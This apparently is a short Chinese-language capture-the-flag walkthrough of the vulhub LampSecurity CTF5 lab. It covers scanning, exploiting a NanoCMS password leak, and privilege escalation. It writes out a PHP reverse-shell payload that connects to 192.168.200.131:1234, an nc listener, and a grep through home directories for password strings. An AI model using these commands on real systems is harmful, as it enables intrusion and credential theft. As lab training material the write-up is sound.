vulhub-LampSecurity:CTF5

常规端口扫描

开放端口较多

--script=vuln漏洞扫描脚本扫描结果非常多,80端口涉及Dos,敏感信息,sql注入,csrf等,其中我们比较关心的可能是sql注入和敏感信息。总之肯定先从web入手。

查看功能点

可以观察到在Blog界面暴露了cms为Nanocms,同时貌似还有一个跳转至管理界面的位置Admin Login,点击链接,可到达Nanocms的管理后台登录界面,如下:

goole查一下nanocms exploit  

第一和第三好像市泄露了密码漏洞

访问一下data/pagesdata.txt

应该是md5加密

解密得到密码密码shannon

登入后台

找找哪个地方可以反弹shell

添加php反弹shell代码试试

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.200.131/1234 0>&1'"); ?>

nc -lvnp 1234

保存后退回首页,再次点击contact

成功反弹shell

提权

常规枚举经过一系列的搜索,没发现特殊的信息,结合/etc/passwd中有Bash的用户有很多,很有可能其中的某个用户会在自己家目录中的文件里写入有关root的密码。我们在/home目录搜索一下包含'pass'字符串的文件有哪些,命令如下:

grep -R -i pass /home/* 2>/dev/null

cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note

su 切换时出现报错

python -c "import pty;pty.spawn('/bin/bash')"争强交互性

成功提权

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值